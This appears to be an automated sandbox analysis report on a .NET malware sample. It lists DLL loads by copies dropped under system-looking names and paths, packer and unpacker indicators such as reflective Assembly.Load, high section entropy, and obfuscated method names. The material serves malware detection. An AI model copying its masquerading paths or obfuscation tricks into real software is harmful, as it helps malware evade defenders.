Source: C:\Windows\Panther\setup.exe\MwDxnowBVCiAiIllnkPs.exe	Section loaded: apphelp.dll
Source: C:\Windows\Panther\setup.exe\MwDxnowBVCiAiIllnkPs.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Panther\setup.exe\MwDxnowBVCiAiIllnkPs.exe	Section loaded: version.dll
Source: C:\Windows\Panther\setup.exe\MwDxnowBVCiAiIllnkPs.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Panther\setup.exe\MwDxnowBVCiAiIllnkPs.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Panther\setup.exe\MwDxnowBVCiAiIllnkPs.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Panther\setup.exe\MwDxnowBVCiAiIllnkPs.exe	Section loaded: uxtheme.dll
Source: C:\Windows\Panther\setup.exe\MwDxnowBVCiAiIllnkPs.exe	Section loaded: windows.storage.dll
Source: C:\Windows\Panther\setup.exe\MwDxnowBVCiAiIllnkPs.exe	Section loaded: wldp.dll
Source: C:\Windows\Panther\setup.exe\MwDxnowBVCiAiIllnkPs.exe	Section loaded: profapi.dll
Source: C:\Windows\Panther\setup.exe\MwDxnowBVCiAiIllnkPs.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Panther\setup.exe\MwDxnowBVCiAiIllnkPs.exe	Section loaded: rsaenh.dll
Source: C:\Windows\Panther\setup.exe\MwDxnowBVCiAiIllnkPs.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Panther\setup.exe\MwDxnowBVCiAiIllnkPs.exe	Section loaded: sspicli.dll
Source: C:\Windows\Panther\setup.exe\MwDxnowBVCiAiIllnkPs.exe	Section loaded: mscoree.dll
Source: C:\Windows\Panther\setup.exe\MwDxnowBVCiAiIllnkPs.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Panther\setup.exe\MwDxnowBVCiAiIllnkPs.exe	Section loaded: version.dll
Source: C:\Windows\Panther\setup.exe\MwDxnowBVCiAiIllnkPs.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Panther\setup.exe\MwDxnowBVCiAiIllnkPs.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Panther\setup.exe\MwDxnowBVCiAiIllnkPs.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Panther\setup.exe\MwDxnowBVCiAiIllnkPs.exe	Section loaded: uxtheme.dll
Source: C:\Windows\Panther\setup.exe\MwDxnowBVCiAiIllnkPs.exe	Section loaded: windows.storage.dll
Source: C:\Windows\Panther\setup.exe\MwDxnowBVCiAiIllnkPs.exe	Section loaded: wldp.dll
Source: C:\Windows\Panther\setup.exe\MwDxnowBVCiAiIllnkPs.exe	Section loaded: profapi.dll
Source: C:\Windows\Panther\setup.exe\MwDxnowBVCiAiIllnkPs.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Panther\setup.exe\MwDxnowBVCiAiIllnkPs.exe	Section loaded: rsaenh.dll
Source: C:\Windows\Panther\setup.exe\MwDxnowBVCiAiIllnkPs.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Panther\setup.exe\MwDxnowBVCiAiIllnkPs.exe	Section loaded: sspicli.dll
Source: C:\Recovery\RuntimeBroker.exe	Section loaded: mscoree.dll
Source: C:\Recovery\RuntimeBroker.exe	Section loaded: apphelp.dll
Source: C:\Recovery\RuntimeBroker.exe	Section loaded: kernel.appcore.dll
Source: C:\Recovery\RuntimeBroker.exe	Section loaded: version.dll
Source: C:\Recovery\RuntimeBroker.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Recovery\RuntimeBroker.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\RuntimeBroker.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\RuntimeBroker.exe	Section loaded: uxtheme.dll
Source: C:\Recovery\RuntimeBroker.exe	Section loaded: windows.storage.dll
Source: C:\Recovery\RuntimeBroker.exe	Section loaded: wldp.dll
Source: C:\Recovery\RuntimeBroker.exe	Section loaded: profapi.dll
Source: C:\Recovery\RuntimeBroker.exe	Section loaded: cryptsp.dll
Source: C:\Recovery\RuntimeBroker.exe	Section loaded: rsaenh.dll
Source: C:\Recovery\RuntimeBroker.exe	Section loaded: cryptbase.dll
Source: C:\Recovery\RuntimeBroker.exe	Section loaded: sspicli.dll
Source: C:\Recovery\RuntimeBroker.exe	Section loaded: mscoree.dll
Source: C:\Recovery\RuntimeBroker.exe	Section loaded: kernel.appcore.dll
Source: C:\Recovery\RuntimeBroker.exe	Section loaded: version.dll
Source: C:\Recovery\RuntimeBroker.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Recovery\RuntimeBroker.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\RuntimeBroker.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Recovery\RuntimeBroker.exe	Section loaded: uxtheme.dll
Source: C:\Recovery\RuntimeBroker.exe	Section loaded: windows.storage.dll
Source: C:\Recovery\RuntimeBroker.exe	Section loaded: wldp.dll
Source: C:\Recovery\RuntimeBroker.exe	Section loaded: profapi.dll
Source: C:\Recovery\RuntimeBroker.exe	Section loaded: cryptsp.dll
Source: C:\Recovery\RuntimeBroker.exe	Section loaded: rsaenh.dll
Source: C:\Recovery\RuntimeBroker.exe	Section loaded: cryptbase.dll
Source: C:\Recovery\RuntimeBroker.exe	Section loaded: sspicli.dll
Source: C:\Windows\twain_32\SgrmBroker.exe	Section loaded: mscoree.dll
Source: C:\Windows\twain_32\SgrmBroker.exe	Section loaded: apphelp.dll
Source: C:\Windows\twain_32\SgrmBroker.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\twain_32\SgrmBroker.exe	Section loaded: version.dll
Source: C:\Windows\twain_32\SgrmBroker.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\twain_32\SgrmBroker.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\twain_32\SgrmBroker.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\twain_32\SgrmBroker.exe	Section loaded: uxtheme.dll
Source: C:\Windows\twain_32\SgrmBroker.exe	Section loaded: windows.storage.dll
Source: C:\Windows\twain_32\SgrmBroker.exe	Section loaded: wldp.dll
Source: C:\Windows\twain_32\SgrmBroker.exe	Section loaded: profapi.dll
Source: C:\Windows\twain_32\SgrmBroker.exe	Section loaded: cryptsp.dll
Source: C:\Windows\twain_32\SgrmBroker.exe	Section loaded: rsaenh.dll
Source: C:\Windows\twain_32\SgrmBroker.exe	Section loaded: cryptbase.dll
Source: C:\Windows\twain_32\SgrmBroker.exe	Section loaded: sspicli.dll
Source: C:\Windows\twain_32\SgrmBroker.exe	Section loaded: mscoree.dll
Source: C:\Windows\twain_32\SgrmBroker.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\twain_32\SgrmBroker.exe	Section loaded: version.dll
Source: C:\Windows\twain_32\SgrmBroker.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\twain_32\SgrmBroker.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\twain_32\SgrmBroker.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\twain_32\SgrmBroker.exe	Section loaded: uxtheme.dll
Source: C:\Windows\twain_32\SgrmBroker.exe	Section loaded: windows.storage.dll
Source: C:\Windows\twain_32\SgrmBroker.exe	Section loaded: wldp.dll
Source: C:\Windows\twain_32\SgrmBroker.exe	Section loaded: profapi.dll
Source: C:\Windows\twain_32\SgrmBroker.exe	Section loaded: cryptsp.dll
Source: C:\Windows\twain_32\SgrmBroker.exe	Section loaded: rsaenh.dll
Source: C:\Windows\twain_32\SgrmBroker.exe	Section loaded: cryptbase.dll
Source: C:\Windows\twain_32\SgrmBroker.exe	Section loaded: sspicli.dll
Source: C:\ProgramData\sihost.exe	Section loaded: mscoree.dll
Source: C:\ProgramData\sihost.exe	Section loaded: apphelp.dll
Source: C:\ProgramData\sihost.exe	Section loaded: kernel.appcore.dll
Source: C:\ProgramData\sihost.exe	Section loaded: version.dll
Source: C:\ProgramData\sihost.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\ProgramData\sihost.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\ProgramData\sihost.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\ProgramData\sihost.exe	Section loaded: uxtheme.dll
Source: C:\ProgramData\sihost.exe	Section loaded: windows.storage.dll
Source: C:\ProgramData\sihost.exe	Section loaded: wldp.dll
Source: C:\ProgramData\sihost.exe	Section loaded: profapi.dll
Source: C:\ProgramData\sihost.exe	Section loaded: cryptsp.dll
Source: C:\ProgramData\sihost.exe	Section loaded: rsaenh.dll
Source: C:\ProgramData\sihost.exe	Section loaded: cryptbase.dll
Source: C:\ProgramData\sihost.exe	Section loaded: sspicli.dll
Source: C:\ProgramData\sihost.exe	Section loaded: mscoree.dll
Source: C:\ProgramData\sihost.exe	Section loaded: kernel.appcore.dll
Source: C:\ProgramData\sihost.exe	Section loaded: version.dll
Source: C:\ProgramData\sihost.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\ProgramData\sihost.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\ProgramData\sihost.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\ProgramData\sihost.exe	Section loaded: uxtheme.dll
Source: C:\ProgramData\sihost.exe	Section loaded: windows.storage.dll
Source: C:\ProgramData\sihost.exe	Section loaded: wldp.dll
Source: C:\ProgramData\sihost.exe	Section loaded: profapi.dll
Source: C:\ProgramData\sihost.exe	Section loaded: cryptsp.dll
Source: C:\ProgramData\sihost.exe	Section loaded: rsaenh.dll
Source: C:\ProgramData\sihost.exe	Section loaded: cryptbase.dll
Source: C:\ProgramData\sihost.exe	Section loaded: sspicli.dll

Source: C:\Users\user\Desktop\jmBb9uY1B8.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: jmBb9uY1B8.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: jmBb9uY1B8.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: jmBb9uY1B8.exe

Static file information: File size 1858048 > 1048576

Source: jmBb9uY1B8.exe

Static PE information: Raw size of .text is bigger than: 0x100000 < 0x1c2000

Source: jmBb9uY1B8.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Data Obfuscation

.NET source code contains method to dynamically call methods (often used by packers)

Source: jmBb9uY1B8.exe, HfWaKmaRxUDg34apENZ.cs

.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})

.NET source code contains potential unpacker

Source: jmBb9uY1B8.exe, CtidFkotLak7rEyUFvA.cs	.Net Code: c3FU2qJv0w System.AppDomain.Load(byte[])
Source: jmBb9uY1B8.exe, CtidFkotLak7rEyUFvA.cs	.Net Code: c3FU2qJv0w System.Reflection.Assembly.Load(byte[])
Source: jmBb9uY1B8.exe, CtidFkotLak7rEyUFvA.cs	.Net Code: c3FU2qJv0w

Source: C:\Program Files (x86)\Internet Explorer\en-GB\MwDxnowBVCiAiIllnkPs.exe

Code function: 31_2_00007FFD9B7EAEEA pushad ; ret

31_2_00007FFD9B7EAEEB

Source: jmBb9uY1B8.exe	Static PE information: section name: .text entropy: 7.442492770747193
Source: MwDxnowBVCiAiIllnkPs.exe.0.dr	Static PE information: section name: .text entropy: 7.442492770747193
Source: StartMenuExperienceHost.exe.0.dr	Static PE information: section name: .text entropy: 7.442492770747193
Source: MwDxnowBVCiAiIllnkPs.exe0.0.dr	Static PE information: section name: .text entropy: 7.442492770747193
Source: sihost.exe.0.dr	Static PE information: section name: .text entropy: 7.442492770747193

Source: jmBb9uY1B8.exe, arPQCk4Fa2mKp9WTetP.cs	High entropy of concatenated method names: '_625', 'YZ8', '_9pX', 'G9C', 'JsARcjaempSyMZqVwXy', 'fZMdZEaCASWCi1tgqxL', 'W7fxG5a1gff8G2n2K5q', 'OvPUw7akbNsJ4Zofodm', 'HldW92aoQ7YGXOA1XL0', 'RNOKa3axWjyvxH1ZDNV'
Source: jmBb9uY1B8.exe, Vyw8SFPPWqLLxvikou7.cs	High entropy of concatenated method names: 'Qkp', '_72e', 'R26', '_7w6', 'Awi', 'n73', 'cek', 'ro1', '_9j4', '_453'
Source: jmBb9uY1B8.exe, o7j7F2PwwAlkPxjxypB.cs	High entropy of concatenated method names: 'IGD', 'CV5', 'cS4dZlTKGe', '_3k4', 'elq', 'hlH', 'yc1', 'Y17', '_2QC', 'En1'
Source: jmBb9uY1B8.exe, nd9IBePXpu1S9Orc0qx.cs	High entropy of concatenated method names: '_7tu', '_8ge', 'DyU', '_58f', '_254', '_6Q3', '_7f4', 'B3I', '_75k', 'd4G'
Source: jmBb9uY1B8.exe, EM6IsxovGeY2dqF79ku.cs	High entropy of concatenated method names: 'fx1mMhNZlF', 'PVXmA0O738', 'cuQmzNK9W8', 'Q49NbGSkU9', 'glJN4UhZ1D', 'gUWNoWLVCK', 'sAQNUsEf5u', 'U6HNmM6KM9', 'vhtNNjdhxP', 'DvG0ANJvhbx5RK5pfeY'
Source: jmBb9uY1B8.exe, RymApP4NIcQ6nRZQRCo.cs	High entropy of concatenated method names: 'K55', 'YZ8', '_9yX', 'G9C', 'fnd8mpgRfpxiPF3Ldxg', 'ek2orVgELeu2380PSLJ', 'j9nXfRgce07v6bl4DoC', 'In01RFgXFZjWquO0cgo', 'tTRXfOgQr6feLSKumXI', 'ogrSYngiAn7MtWqbL1g'
Source: jmBb9uY1B8.exe, tqqK3b4UjGu9fKnwq79.cs	High entropy of concatenated method names: 'R1x', 'YZ8', '_8U7', 'G9C', 'Yb1yUdg87G3bQO9L6kx', 'BtnG58gnsRLKtpDqRZd', 'Tm2c9RgAhoIatMrmoQi', 'gLdxfGgtMKYjfWb8n7v', 'vM0XpRgFogST9ob28G7', 'Hb3hwggNhKvDAiMiJTM'
Source: jmBb9uY1B8.exe, D5RchCxTBtd99Z8ELA.cs	High entropy of concatenated method names: '_3OK', 'YZ8', '_321', 'G9C', 'o4degqK9T5dwNdryuSq', 'hdaijTKpZ3sd8WqVXLp', 'kGY9X5Kz2NYnPHsfD1q', 'wEPaTwdYsLUIjJC5GMX', 'O16lEfd3MdyxiiYnV4l', 'EPVfhudKoBUKF7bs3Kp'
Source: jmBb9uY1B8.exe, pYcluRaRfYwGqjOd1E.cs	High entropy of concatenated method names: 'vluRRRfYw', 'xAyq2ItYKGajxYAMkO', 'WkxxDKnATQ5XWERnSr', 'jSN2PAATQjA4HRckdp', 'oCjRG9FF5PEZL9HUDj', 'DwZbDyNoSUc0WVsdAD', 'o89oO7gp9', 'kDZUN87pB', 'VvFmK4j3T', 'hXaNoJKXI'
Source: jmBb9uY1B8.exe, hQNK9Woj8F49GSkU9al.cs	High entropy of concatenated method names: 'CJjmRfBHHj', 'Oyvm2q2soE', 'AZUPpi6ohDmw0f61yxY', 'iQDuV06xmHYaVGXbfIA', 'TFoJqC616i33De8Qdtm', 'NnbKNv6kFFNQ7t75WHF', 'bfMSIN60gcNVBPI962f', 'u7psqa654LqrZciXjdU', 'NpH8oA6VDL4ZxpPcQd1', 'o9Wb5J64hZSuEvQOZyt'
Source: jmBb9uY1B8.exe, vskQLarlppMGxgdRZX.cs	High entropy of concatenated method names: '_52Y', 'YZ8', 'Eg4', 'G9C', 'ckyLiacVw', 'ACwUT5KyhklRsCbjgac', 'K2psfjKmBffPtmlbo2d', 'QKFH07KeDUuiYtGPWXZ', 'wKMTaiKCLniTww2WWXS', 'TwHbFCK1j3hrBFwcOBP'
Source: jmBb9uY1B8.exe, P2FgM7BXHTk077oISJ.cs	High entropy of concatenated method names: '_59M', 'YZ8', '_1zA', 'G9C', 'oPlV8EduKSRyO5Q2Xkp', 'GFOb9Jd2jZ9LuOawKDR', 'qXJxxCdZWiPTN9IDmtQ', 'z9TGNLdLDN7E3VRBqq3', 'rwAZyCdMuXRQ1qrlihm', 'PPxyrHdsyZtXMo9QZxp'
Source: jmBb9uY1B8.exe, xPiggwo884nlxcH5Np4.cs	High entropy of concatenated method names: 'iRXUzlCEpd', 'Glpmbr3i36', 'oucm4Phsj3', 'utkmor8A5I', 'W0rmUVAbGA', 'E3GmmjFbLe', 'veDmNixsVa', 'YInmPEwnr9', 'krSmaCiOH7', 'dE4muIokqs'
Source: jmBb9uY1B8.exe, QoT3MnoAcyFlnABTWWn.cs	High entropy of concatenated method names: 'RdTaXp4H5A', 'sJl5pEfQRNoRGgjSHoV', 'OkUErwfcs3tvjDOpV90', 'yfsJy9fXPMUeg21ZbQc', 'tQcqk4fiQSBTA1YG0U1', 'R1a94VfPp4YLsOUPscF', 'lZZa87Ix1F', 'GTNaVQLLG1', 'dOFajP6mdj', 'P8xaJma7j3'
Source: jmBb9uY1B8.exe, yhxPw9ocIuJOZ8DFudL.cs	High entropy of concatenated method names: 'sjqmJm4KrB', 'MeYm9FiUTE', 'DFHmcbNXHj', 'TnAmwJPY9b', 'SaCmZyJQOC', 'wgKHcwJYMIpCNwToWT3', 'baT803J3YyrwuRTuk2U', 'B7Bt096ppBRpMZDTh0J', 'g2eoqJ6z9d4eOVHWOqv', 'zkSuDLJKYeq3TAYLpKn'
Source: jmBb9uY1B8.exe, pAf3Gj4gFbLeceDixsV.cs	High entropy of concatenated method names: 'aydoVXKEFc', 'zy6NI5hglibW7KfmHOE', 'Bu4YwAhWFX6cWDxX9c3', 'g111MUhH85mTt3VaYof', 'Aod72WhlUMREo3c7k9d', 'ATJNXhhI0wd3rkANXqq', '_5q7', 'YZ8', '_6kf', 'G9C'
Source: jmBb9uY1B8.exe, N7VrQVmKfIXUlVh9LRT.cs	High entropy of concatenated method names: 'rpMRIKMlRL', 'qaVRe5mCHO', 'M4ZRxUULxS', 'XMmRDoU4YU', 'A3oRBtZ6Ol', 'L2FLLg5yg94p7U0pf1p', 'buoOqA5rYBmiRWSiqSe', 'FaROAi5fOD4va9gOoaN', 'B28wt65mIjS5LgvE8U4', 'QLGOjB5eZAKVaFf52Mr'
Source: jmBb9uY1B8.exe, qq0DySN5niNl3xcFvte.cs	High entropy of concatenated method names: '_14Y', 'b41', 'D7Y', 'xMq', 'i39', '_77u', '_4PG', '_5u8', 'h12', '_2KT'
Source: jmBb9uY1B8.exe, F0GsTV4Hi3Y6xog2cZK.cs	High entropy of concatenated method names: '_2WU', 'YZ8', '_743', 'G9C', 'QsLAqHagukcHiSZ7Bwc', 'Uq6siDaWuRvSVARFew2', 'xmDQ9waIcdUScfHXJvn', 'nXRHT5awJoRTB6m43bH', 'LX5vkyaHh0wQpJZVMsL', 'zTT4iSalQOp1WACh6n2'
Source: jmBb9uY1B8.exe, ki97POm8RtpPaIjKk0p.cs	High entropy of concatenated method names: '_7zt', 'trxSVJ0ZjG', 'CKaSjFpWXG', 'TQ2SJNfdTo', 'tBSS9i4BLZ', 'fd6Sc7kjTi', 'YHRSwLqaSw', 'JXYrZs014foR7FVKkOT', 'hI3L9e0k6EB5E7N99as', 'odxPec0eHZI9W9D9AJA'
Source: jmBb9uY1B8.exe, n74jTy4q5XOg2NlTMUu.cs	High entropy of concatenated method names: '_981', 'YZ8', 'd52', 'G9C', 'lIBtIqWPMjHJ3l75BAF', 'S4lOccWGR9eMbNYeiGn', 'XiKE7IWvZU3Raj6Ij1P', 'PGrHZrWBs3dbQDj86Ov', 'MGD9mNWTfJmU97jExCG', 'YWM9erW9J7I5C3nxgQf'
Source: jmBb9uY1B8.exe, tfrsWcPrAD2nZrhsjUg.cs	High entropy of concatenated method names: '_159', 'rI9', '_2Cj', 'IIRKXtPjIA', 'nGYKdtO1Ep', 'GyWKKo5gb0', 'mdxK7WQ5Ni', 'sqDKvIKsXX', 'Im0KpslKPP', 'RfTFa6q2ajuB2Y7DGen'
Source: jmBb9uY1B8.exe, DFkZP04WYq57M4avlG6.cs	High entropy of concatenated method names: 'VYFo4GFVBO', 'BRsooOXPsw', 'rpNoUZVwru', 'LNu6SojiQSKYEY87MRs', 'BZk0wAjPeF2TNWNhUaA', 'PCCWKyjXEwjiays3o5D', 'uAVQenjQfjYFciThFFa', 'BHUjgNjGAQcdRQVyxsO', 'b44lvpjvy39WExoRLDp', 'zDfKxhjBQ6QCC6ve9Q1'
Source: jmBb9uY1B8.exe, dmwZaPmQZnGOU3wVLNk.cs	High entropy of concatenated method names: 'P29', '_3xW', 'bOP', 'Th1', '_36d', 'n6O210KS9L', 'aBt2qwVJMY', 'r8j', 'LS1', '_55S'
Source: jmBb9uY1B8.exe, RIRv9SUlbEDvwBR4X9T.cs	High entropy of concatenated method names: 'sg9', 'zXkHjwMQR4', 'FiPtMwpMAj', 'K0EH70Deuu', 'XVnZtZ1cxZmsep4PfSk', 'qGAllP1XPycvkOS7iPd', 'XKBB3q1QqQFTNJlZqSR', 'QddVof1RB9v6goV6qqv', 'vG6Wh21E1rG1r0wmeer', 'v8ByyD1icBLEjUTdjnm'
Source: jmBb9uY1B8.exe, XGXOGlUqPFDu45ubVXs.cs	High entropy of concatenated method names: 'qOMuFfG0iV', 'mncuQBVmmM', 'f3muELkpWd', 'nLsogqeRHegWQp4DiQ8', 'CZf6ajeE5Drq6AhjBKA', 'I29Fhqec2kUwXpsbTNx', 'th6STpeX0efTKSNtDGN', 'dQ7tDXeQSomTGFjv2eY', 'kNiUkdeiFhGuKn4fXOn', 'ceaPgxePcfIwrUlO1Ud'
Source: jmBb9uY1B8.exe, jWGX38cMvJbb9vrds2.cs	High entropy of concatenated method names: 'WRBZnXdLi', 'KDyXSZbyi', 'wWZdKDAi7', 'JA0K7cL1k', 'pX37nx3VM', 'Kqnvjrdnt', 'AN3pNeY37', 'dPqXFQ3IQ3mu3fjpA3l', 'Uq70Gt3wf5pSKlUiie7', 'oxjHSW3jW11oTLKqRdK'
Source: jmBb9uY1B8.exe, HkMtMimGs4jpU5bssVY.cs	High entropy of concatenated method names: 'f0mSmmFZBA', 'WLSSNvSdKO', 'XJfSPRxLG0', 'Qmiw3B0SPUJ2OOHFUPi', 'X8niAX0rcyK6rD5xd4D', 'eYfr5y06ESQfIRVfZu5', 'yiA5g10J3EjVhaLTiNn', 'HDyRbi0fwVyTfv51DsK', 'YGP0vY0yy3ATJDT3CHd', 'la7dt20miTBqYTJtiQ6'
Source: jmBb9uY1B8.exe, j2f9FxzJLqFtTsjjHQ.cs	High entropy of concatenated method names: 'Y29', 'YZ8', 'jn6', 'G9C', 'MNyN5LgdxCSmpHwP6ZU', 'BDVCBBgHxNSLaLhBWo1', 'P8NIMoglFd9sUPiycj4', 'QMwyx0ggQL1phhY4WXf', 'KotfaNgWeOH6wCVKGMh', 'QEsCv6gIOasoNi3bWss'
Source: jmBb9uY1B8.exe, QXJtd3oGWlWDFclNE8t.cs	High entropy of concatenated method names: 'EDPUMHp3XS', 'rTRUArxa4n', 'OSesnV7y6sZCtitTrqy', 'xUmv347m2maMBnen1Vu', 'C7Ny3w7e6okoFE0c9Gs', 'QPcST37CYNq92fpmoSh', 'e8qXLj71RkWQuhGfEWS', 'U7cJDd7k9IF6nMOciiS', 'NK640H7oGswqx1yHHlk', 'BUN1cj7xhfRsikcnHpr'
Source: jmBb9uY1B8.exe, RNgrTi4iu7yCLTsk4jR.cs	High entropy of concatenated method names: 'qkkoYJCOOD', 'iQsokaL3QX', 'L6KmkKahPO1MOC66TyW', 'qY9SmDajY3qE1pI84GA', 'lYi4x3aaxg4m3IjswFw', 'hwJbpyaUSkUIuWICGOj', 'RRuIVnab2abEX1FUTpX', 'cKy8PWa7YEjSYFsdyTP', 'eRUUWRa6SwhgbTSUhxX', 'g80lZKaJbyoFWerNZUx'
Source: jmBb9uY1B8.exe, TUdwbVPb85viGJCNu0q.cs	High entropy of concatenated method names: 'IvxX0fD5x9', 'FuFXimkrWl', 'W4sX3c27Of', 'RUoXFXepKk', 'EMQXQ55xG5', 'MHtXECNSB7', '_838', 'vVb', 'g24', '_9oL'
Source: jmBb9uY1B8.exe, fyJqYRPHgtBbb5YP9cj.cs	High entropy of concatenated method names: 'PJ1', 'jo3', 'SRGptSxPS6', 'ra7pTGhVBC', 'FulpYeEIax', 'EC9', '_74a', '_8pl', '_27D', '_524'
Source: jmBb9uY1B8.exe, zEFcvd4a31rcBTyHCtR.cs	High entropy of concatenated method names: '_6H9', 'YZ8', '_66N', 'G9C', 'pqDwAvgvsesl24nUUrF', 'D39km2gB3tihxMEbua2', 'VuFX8ggT9fwm85TgGdN', 'l3wVcJg94GB6vRUH2I2', 'O2NZP0gpbCjTnuMX5ZF', 'x5jR4igzaTS0TbaNhL4'
Source: jmBb9uY1B8.exe, UWYavdU4BsZIRpWqQsb.cs	High entropy of concatenated method names: 'A0iapHNlIi', 'Cifa68UdpJ', 'kHyarx9VKV', 'FQHaf9TroN', 'GKCJcSfzKqFxxn06U44', 'w605BHf9h68rln4Bjur', 'wPCNQyfpP8RtEhappf3', 'WpIpIiyYxTsm6aFSqjx', 'YTjsy7y3lcOXHiowXC0', 'vR0fhOyKMJFbVVOqilA'
Source: jmBb9uY1B8.exe, vlsOtjNKRtpaSJ1nJHG.cs	High entropy of concatenated method names: 'NNZZhR3tRM', 'gLLZL02jXP', 'I7rZWgW6fT', 'MVBZlWD08D', 'jFmZsdn5ws', 'jhE3UV2VbnLFryoQW2o', 'VSESG020vg9cWYYwegb', 'Wp3aem25dPQgjxpnglm', 'FqtLQt24Dpyluf2WuFp', 'Q4xOq428f4s4X439Ja9'
Source: jmBb9uY1B8.exe, FjCfbFmCt6ig7Hs7yPU.cs	High entropy of concatenated method names: 'rdW2MLnACN', 'UrO2emDXSf', 'nvr2xYU8Y1', 'nEw2DrCisv', 'dUp2BhXBmA', 'O1y2hf17Up', 'w0S2LwNfyq', 'dyG2WgmNIE', 'Hxb2l1rqDw', 'JYr2sDHhub'
Source: jmBb9uY1B8.exe, OD0X91PoCH9OgrJRwYP.cs	High entropy of concatenated method names: 'E2KdusLrGq', 'iDNdtctiJQ', '_8r1', 'kAQdTogfLu', 'qsBdYCZm33', 'ucedkA4F1X', 'ukqdSxXPsI', 'z0XYd7MJqQ57XcRuq02', 'PH48rUMSHSUISVOxSmL', 'sluuGTMr87p1nOC5Bcb'
Source: jmBb9uY1B8.exe, yFplLxUz3QOkCRkltCY.cs	High entropy of concatenated method names: 'CauT7lZ5Be', 'VLkTvxrORf', 'AZpTpK3li6', 'RtY3odosuiOenAqxfEO', 'KFLuEnoqVPFLfYrnCkM', 'MfBhVdoLiFlHOorDRnd', 'sSv1JmoMv90eY5hGKnm', 'thTnhGoDx3OyfnHA43a', 'toYvHHoObAEgpxHYMvf', 'dr1mA6oR5RKkbZURJta'
Source: jmBb9uY1B8.exe, M8saAIUHcwoF0dMEvce.cs	High entropy of concatenated method names: '_5u9', 'z5kHZGefJD', 'dhgTb2yoCP', 'SY0H2T8fH2', 'RTd0aH1TILhmg1Z8TEc', 'iN6hAh19ANMGa64LTAT', 'nhkYMl1pBPZrFhBD1HQ', 'ehotMS1vC1O5aKJrT7k', 'eur5QI1BS1i43HfChIT', 'y6E3Ed1z4ZyHcR2tWNi'
Source: jmBb9uY1B8.exe, nAT1MkLiPWnLDyBlvn.cs	High entropy of concatenated method names: '_23T', 'YZ8', 'ELp', 'G9C', 'rt6P4mdBlErtA3yd8e4', 'C5lwIfdTqusr1RVxCOd', 'VLwDTEd9OZkPCBcSJW8', 'TtEhnQdpZhAU3f5GLqD', 'Mn2mLRdzNx9CbJUgQPl', 'fwee4VHYvoZ87Jkmv74'
Source: jmBb9uY1B8.exe, t0vQ38Ui3FGsKm6RydC.cs	High entropy of concatenated method names: 'oYo', '_1Z5', 'fS8HpP9Iud', 'MjNTmeV6rC', 'QgLHTbhGeC', 'zS3Wtmkb3F5arDOaLts', 'adotYCk7HTmYAgLDKkb', 'GKWfHqk6PBC4g83EEfD', 'E3SS7rkJXG2wVVeGAHR', 'PrMYUGkSsb3laiSI1v0'
Source: jmBb9uY1B8.exe, qs5dYYUnPyBrLLo3MsO.cs	High entropy of concatenated method names: 'lQ2u5galTf', 'tILuCM0vwW', 'W0YuO2yItP', 'hv2ugsPEPm', 'nSNuyxktue', 'MugA4GCgHWfYjYcK8kD', 'DLFeWbCWAs9tvxa1hAI', 'IASpH9CH7p8WJZuYW4q', 'tddFSSClW9uODEfBclb', 'KfqCkaCIgQSMvikahWJ'
Source: jmBb9uY1B8.exe, EBWwnnCCD6KLp5oNE7.cs	High entropy of concatenated method names: 'pHw', 'YZ8', 'v2R', 'G9C', 'tnbjsplVg2bGcHsQ6aL', 'gfVI38l4oejEDWWwwRg', 'FTsLw4l8gAp4UhgwaCl', 'DrePvVln61divoIDU6u', 'El9wjclA0GRIgWwVnVl', 'lBQJdTlthmHLKL9tgSM'
Source: jmBb9uY1B8.exe, OjTtXH76NWfWJNhPka.cs	High entropy of concatenated method names: 'T43', 'YZ8', '_56i', 'G9C', 'vSmlEpKaW6YB5vxFp82', 'Cult5KKh8Bk1BcpqoEo', 'XItqvLKUyFn1xj4hx2x', 'HUF7KYKblEjODvT1oII', 'lqCAKCK7UgFqlmOy2b5', 'T5LUMGK6epeHv91HN9O'
